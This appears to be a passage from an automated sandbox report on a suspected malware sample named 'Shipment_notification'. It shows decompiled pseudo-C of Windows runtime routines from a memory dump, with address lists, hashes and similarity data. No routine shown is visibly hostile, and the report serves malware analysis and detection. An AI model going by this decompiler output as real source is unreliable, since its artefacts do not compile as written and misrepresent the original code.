						_v1140 = E01B63540;
						E01B2FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E01B3DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01B70C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E01B297C0();
					}
					return L01B2B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01B63971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01B63884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E01B2FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L01B29650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01B63787(_a4,  &_v352, _t80);
						}
					}
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E01B295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                0x01b63552
                                                                                0x01b6355a
                                                                                0x01b6355d
                                                                                0x01b63566
                                                                                0x01b63567
                                                                                0x01b6357e
                                                                                0x01b6358f
                                                                                0x01b635a1
                                                                                0x01b635a5
                                                                                0x01b6366b
                                                                                0x01b6366b
                                                                                0x01b6366d
                                                                                0x01b63672
                                                                                0x01b63679
                                                                                0x01b63685
                                                                                0x01b6368d
                                                                                0x01b6369d
                                                                                0x01b636a7
                                                                                0x01b636b8
                                                                                0x01b636c6
                                                                                0x01b636c7
                                                                                0x01b636dc
                                                                                0x01b636e1
                                                                                0x01b636e7
                                                                                0x01b636e9
                                                                                0x01b636e9
                                                                                0x01b63703
                                                                                0x01b63703
                                                                                0x01b635b5
                                                                                0x01b635c0
                                                                                0x01b635c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b635ca
                                                                                0x01b635d7
                                                                                0x01b635e2
                                                                                0x01b635e6
                                                                                0x01b635e8
                                                                                0x01b635f5
                                                                                0x01b635fa
                                                                                0x01b63603
                                                                                0x01b63604
                                                                                0x01b63609
                                                                                0x01b6360a
                                                                                0x01b63612
                                                                                0x01b63613
                                                                                0x01b6361e
                                                                                0x01b63622
                                                                                0x01b63628
                                                                                0x01b6362f
                                                                                0x01b6362f
                                                                                0x01b63636
                                                                                0x01b63638
                                                                                0x01b6363b
                                                                                0x01b63642
                                                                                0x01b63642
                                                                                0x01b63636
                                                                                0x01b63657
                                                                                0x01b63657
                                                                                0x01b6365c
                                                                                0x01b63662
                                                                                0x01b63669
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryHash
                                                                                • API String ID: 0-2202222882
                                                                                • Opcode ID: f9c2509833bce78020cbf4a05fae77af7dd5c135e5bdc70b0350ab96be17b613
                                                                                • Instruction ID: e646d0647c0315e8ac1748e3662acf5dc6ec28e3bae422e4a1652a2c429ded8d
                                                                                • Opcode Fuzzy Hash: f9c2509833bce78020cbf4a05fae77af7dd5c135e5bdc70b0350ab96be17b613
                                                                                • Instruction Fuzzy Hash: 0E4141B2D0052D9ADF259A50CC81FAEB7BCAB55714F0045E5EA0DAB250DB349E888F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E01BB05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E01BB07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01B29730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E01BAA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E01BAA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01BB1293(_t79, _v40, E01BB07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01B07D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E01BA138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                0x01bb05c5
                                                                                0x01bb05ca
                                                                                0x01bb05d3
                                                                                0x01bb06db
                                                                                0x01bb06db
                                                                                0x01bb06dd
                                                                                0x01bb06e3
                                                                                0x01bb06e3
                                                                                0x01bb05dd
                                                                                0x01bb05e7
                                                                                0x01bb05f6
                                                                                0x01bb0600
                                                                                0x01bb0607
                                                                                0x01bb0610
                                                                                0x01bb0615
                                                                                0x01bb061a
                                                                                0x01bb061c
                                                                                0x01bb061e
                                                                                0x01bb0624
                                                                                0x01bb0625
                                                                                0x01bb0627
                                                                                0x01bb0628
                                                                                0x01bb0631
                                                                                0x01bb0640
                                                                                0x01bb064d
                                                                                0x01bb0654
                                                                                0x01bb0654
                                                                                0x01bb0631
                                                                                0x01bb066d
                                                                                0x01bb0674
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb0692
                                                                                0x01bb069e
                                                                                0x01bb06b0
                                                                                0x01bb06a0
                                                                                0x01bb06a9
                                                                                0x01bb06a9
                                                                                0x01bb06b8
                                                                                0x01bb06d6
                                                                                0x01bb06d6
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `
                                                                                • API String ID: 0-2679148245
                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                • Instruction ID: f2f282c927d3292e3a205bf33c24d13d1d9177f1c0916fbff88185cf64605e2b
                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                • Instruction Fuzzy Hash: 3E3126327043066BEB14EE28CC85FEB7BE9EBC4754F144265FA499B680D7B0E904C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B63884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E01B63884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L01B29650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01B04620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L01B29650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                0x01b63893
                                                                                0x01b63896
                                                                                0x01b63899
                                                                                0x01b6389f
                                                                                0x01b638a0
                                                                                0x01b638a4
                                                                                0x01b638a9
                                                                                0x01b638ac
                                                                                0x01b638ad
                                                                                0x01b638ae
                                                                                0x01b638af
                                                                                0x01b638b1
                                                                                0x01b638b4
                                                                                0x01b638bb
                                                                                0x01b638bc
                                                                                0x01b638bd
                                                                                0x01b638c4
                                                                                0x01b638c8
                                                                                0x01b638ca
                                                                                0x01b638ca
                                                                                0x01b638d5
                                                                                0x01b6393e
                                                                                0x01b63940
                                                                                0x01b63942
                                                                                0x01b63952
                                                                                0x01b63954
                                                                                0x01b63961
                                                                                0x01b63961
                                                                                0x01b63967
                                                                                0x01b6396e
                                                                                0x01b6396e
                                                                                0x01b63947
                                                                                0x01b6394c
                                                                                0x00000000
                                                                                0x01b6394c
                                                                                0x01b638ea
                                                                                0x01b638ee
                                                                                0x01b638f8
                                                                                0x01b638f9
                                                                                0x01b638ff
                                                                                0x01b63900
                                                                                0x01b63902
                                                                                0x01b63903
                                                                                0x01b6390b
                                                                                0x01b6390f
                                                                                0x01b63950
                                                                                0x00000000
                                                                                0x01b63950
                                                                                0x01b63915
                                                                                0x01b6391d
                                                                                0x01b6391d
                                                                                0x01b63922
                                                                                0x01b63926
                                                                                0x00000000
                                                                                0x01b63928
                                                                                0x01b6392b
                                                                                0x01b6392b
                                                                                0x01b63935
                                                                                0x01b63937
                                                                                0x01b63937
                                                                                0x00000000
                                                                                0x01b63935
                                                                                0x01b63926
                                                                                0x01b638f0
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryName
                                                                                • API String ID: 0-215506332
                                                                                • Opcode ID: 243cc4862f4bc6c9b9d142b718348c444407e2658d95410e3dde56f8ec7070a1
                                                                                • Instruction ID: 2f6705ebcec189ba6434192c6ee8463cceeff1998117aeb893ce2d646e4904ca
                                                                                • Opcode Fuzzy Hash: 243cc4862f4bc6c9b9d142b718348c444407e2658d95410e3dde56f8ec7070a1
                                                                                • Instruction Fuzzy Hash: 0D31EA32D0051AAFEF19DA58C945D6BBBF8FB60720F0141A9E91DA72A1D7349E04CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 33%
                                                                                			E01B1D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1bdd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01B04120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L01B2B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E01B298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E01B295D0();
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                0x01b1d29c
                                                                                0x01b1d2a6
                                                                                0x01b1d2b1
                                                                                0x01b1d2b5
                                                                                0x01b1d2b6
                                                                                0x01b1d2bc
                                                                                0x01b1d2bd
                                                                                0x01b1d2be
                                                                                0x01b1d2bf
                                                                                0x01b1d2c2
                                                                                0x01b1d2c4
                                                                                0x01b1d2cc
                                                                                0x01b1d384
                                                                                0x01b1d34b
                                                                                0x01b1d34f
                                                                                0x01b1d350
                                                                                0x01b1d351
                                                                                0x01b1d35c
                                                                                0x01b1d35c
                                                                                0x01b1d2d6
                                                                                0x01b1d2da
                                                                                0x01b1d2e1
                                                                                0x01b1d361
                                                                                0x01b1d369
                                                                                0x01b1d36d
                                                                                0x01b1d2e3
                                                                                0x01b1d2e3
                                                                                0x01b1d2e3
                                                                                0x01b1d2e5
                                                                                0x01b1d2ed
                                                                                0x01b1d2f5
                                                                                0x01b1d2fa
                                                                                0x01b1d302
                                                                                0x01b1d303
                                                                                0x01b1d30b
                                                                                0x01b1d30f
                                                                                0x01b1d313
                                                                                0x01b1d318
                                                                                0x01b1d31c
                                                                                0x01b1d320
                                                                                0x01b1d379
                                                                                0x01b1d37d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5affe
                                                                                0x01b5b001
                                                                                0x01b5b011
                                                                                0x00000000
                                                                                0x01b1d322
                                                                                0x01b1d322
                                                                                0x01b1d330
                                                                                0x01b1d337
                                                                                0x01b1d35d
                                                                                0x01b1d339
                                                                                0x01b1d33f
                                                                                0x01b1d38c
                                                                                0x01b1d38c
                                                                                0x01b1d33f
                                                                                0x01b1d349
                                                                                0x00000000
                                                                                0x01b1d349

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 888e1bc0670944a2712a3da70437a4495c324b6870e1c48e7aa2cc7f08a0a5ca
                                                                                • Instruction ID: 3beb13bec652fdaf907571c1fdec1d819f390e9901f66796b42245c07c684845
                                                                                • Opcode Fuzzy Hash: 888e1bc0670944a2712a3da70437a4495c324b6870e1c48e7aa2cc7f08a0a5ca
                                                                                • Instruction Fuzzy Hash: C631C4B15083059FC725DF68D9C495BBFE8EB85654F410A6EF99483250D734DD04CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E01AF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E01B2BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E01B2A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E01B2A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01B04620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                0x01af1b8f
                                                                                0x01af1b9a
                                                                                0x01af1b9c
                                                                                0x01af1b9e
                                                                                0x01af1ba3
                                                                                0x01b47010
                                                                                0x01b47010
                                                                                0x00000000
                                                                                0x01af1ba9
                                                                                0x01af1ba9
                                                                                0x01af1bae
                                                                                0x00000000
                                                                                0x01af1bc5
                                                                                0x01af1bca
                                                                                0x01af1bcf
                                                                                0x01af1bd0
                                                                                0x01af1bd1
                                                                                0x01af1bd2
                                                                                0x01af1bd6
                                                                                0x01af1bdc
                                                                                0x01af1be0
                                                                                0x01b46ffc
                                                                                0x01b47000
                                                                                0x00000000
                                                                                0x01b47006
                                                                                0x01b47009
                                                                                0x01b47009
                                                                                0x01af1be6
                                                                                0x01af1bec
                                                                                0x01af1c0b
                                                                                0x01af1c0b
                                                                                0x01af1c0c
                                                                                0x01af1c11
                                                                                0x01af1c12
                                                                                0x01af1c15
                                                                                0x01af1c1b
                                                                                0x01af1c1f
                                                                                0x01af1c31
                                                                                0x01af1c33
                                                                                0x01b47026
                                                                                0x01b47026
                                                                                0x01af1c21
                                                                                0x01af1c24
                                                                                0x01af1c24
                                                                                0x01af1bee
                                                                                0x01af1bee
                                                                                0x01af1bf2
                                                                                0x01af1c3a
                                                                                0x01af1bf4
                                                                                0x01af1bf4
                                                                                0x01af1c05
                                                                                0x01af1c05
                                                                                0x01af1c09
                                                                                0x01af1c3e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af1c09
                                                                                0x01af1bec
                                                                                0x01af1be0
                                                                                0x01af1bae
                                                                                0x01af1c2e

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: WindowsExcludedProcs
                                                                                • API String ID: 0-3583428290
                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                • Instruction ID: 7a4da6d58a7bac06f0886a5a9bae4197fc41deee65350704be262ec70b2def21
                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                • Instruction Fuzzy Hash: 0721D676501129EBDB269B99C840F7BBB79EB45A50F0544A9FB04CB200DB35D801D7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B0F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                0x01b0f71d
                                                                                0x01b0f722
                                                                                0x01b0f726
                                                                                0x01b54770
                                                                                0x01b0f765
                                                                                0x01b0f769
                                                                                0x01b0f769
                                                                                0x01b0f732
                                                                                0x01b5477a
                                                                                0x00000000
                                                                                0x01b5477a
                                                                                0x01b0f738
                                                                                0x01b0f73a
                                                                                0x01b0f73c
                                                                                0x01b0f73f
                                                                                0x01b0f746
                                                                                0x01b0f778
                                                                                0x01b0f7a9
                                                                                0x01b0f7a9
                                                                                0x01b0f754
                                                                                0x01b0f75a
                                                                                0x01b0f75d
                                                                                0x01b0f75f
                                                                                0x01b0f761
                                                                                0x01b0f76f
                                                                                0x01b0f771
                                                                                0x01b0f771
                                                                                0x01b0f76f
                                                                                0x01b0f763
                                                                                0x00000000
                                                                                0x01b0f763
                                                                                0x01b0f77d
                                                                                0x01b0f7a3
                                                                                0x01b0f7a5
                                                                                0x00000000
                                                                                0x01b0f7a5
                                                                                0x01b0f77f
                                                                                0x01b0f782
                                                                                0x01b0f784
                                                                                0x01b0f786
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0f788
                                                                                0x01b0f748
                                                                                0x01b0f74d
                                                                                0x01b0f78d
                                                                                0x01b0f793
                                                                                0x01b0f7b7
                                                                                0x01b0f7bc
                                                                                0x00000000
                                                                                0x01b0f7bc
                                                                                0x01b0f798
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0f79d
                                                                                0x01b0f7b0
                                                                                0x00000000
                                                                                0x01b0f7b0
                                                                                0x01b0f79f
                                                                                0x00000000
                                                                                0x01b0f74f
                                                                                0x01b0f74f
                                                                                0x00000000
                                                                                0x01b0f74f

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx
                                                                                • API String ID: 0-89312691
                                                                                • Opcode ID: 8575c7214dfdd82e7661403bda4533dd8a787abbaa8a3c3bd67a1cbadfe0adc3
                                                                                • Instruction ID: 518382211b511fc2b27fcb8bee67e7470f2267d98cd6dedb79c0d6cf9fa0592f
                                                                                • Opcode Fuzzy Hash: 8575c7214dfdd82e7661403bda4533dd8a787abbaa8a3c3bd67a1cbadfe0adc3
                                                                                • Instruction Fuzzy Hash: 6C1190357046028FEB3F8E1DC4907367E95EB95664F2446AEE961CB3D1EBB0C8418343
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B98DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E01B98DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1bc0d50);
				E01B3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01B75720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L01B3DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L01B3DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E01B3D130(_t34, _t39, _t40);
			}





                                                                                0x01b98df1
                                                                                0x01b98df1
                                                                                0x01b98df1
                                                                                0x01b98df1
                                                                                0x01b98df1
                                                                                0x01b98df1
                                                                                0x01b98df3
                                                                                0x01b98df8
                                                                                0x01b98dfd
                                                                                0x01b98e00
                                                                                0x01b98e0e
                                                                                0x01b98e2a
                                                                                0x01b98e36
                                                                                0x01b98e38
                                                                                0x01b98e3c
                                                                                0x01b98e46
                                                                                0x01b98e46
                                                                                0x01b98e36
                                                                                0x01b98e50
                                                                                0x01b98e56
                                                                                0x01b98e59
                                                                                0x01b98e5c
                                                                                0x01b98e60
                                                                                0x01b98e67
                                                                                0x01b98e6d
                                                                                0x01b98e73
                                                                                0x01b98e74
                                                                                0x01b98eb1
                                                                                0x01b98ebd

                                                                                Strings
                                                                                • Critical error detected %lx, xrefs: 01B98E21
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Critical error detected %lx
                                                                                • API String ID: 0-802127002
                                                                                • Opcode ID: dcd89101b8cf9bb03230f256b1854e454989efd8f3f0e02b16572e75d198f989
                                                                                • Instruction ID: da1282c5546adc5464fab818f4a0547df83e878f67be9011d7885a2e0b4e0818
                                                                                • Opcode Fuzzy Hash: dcd89101b8cf9bb03230f256b1854e454989efd8f3f0e02b16572e75d198f989
